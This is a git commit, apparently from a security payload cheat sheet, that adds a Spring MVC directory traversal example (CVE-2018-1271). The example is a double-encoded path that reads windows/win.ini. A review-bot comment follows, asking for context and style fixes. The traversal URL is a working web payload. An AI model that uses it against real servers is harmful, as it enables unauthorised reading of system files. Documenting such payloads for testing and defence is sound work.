Directory Traversal CVE 2018 Spring

Swissky
2019-07-27 13:02:16 +02:00
parent 98124178db
commit 6baa446144
3 changed files with 9 additions and 3 deletions


@@ -70,6 +70,8 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
\ = %255c
```
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
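Review bot: the added `**e.g:**` line gives the CVE-2018-1271 URL with no context on why it works or where it applies. Say that the payload is the double-encoded backslash from the `\ = %255c` mapping just above it and that it is Windows-only (the path ends in `windows/win.ini`), and link the vendor advisory so readers can check affected versions and the fix. Two style points on the same line: write "e.g." rather than "e.g:", and leave a blank line before `### UNC Bypass` so the heading is not parsed as a continuation of the example paragraph.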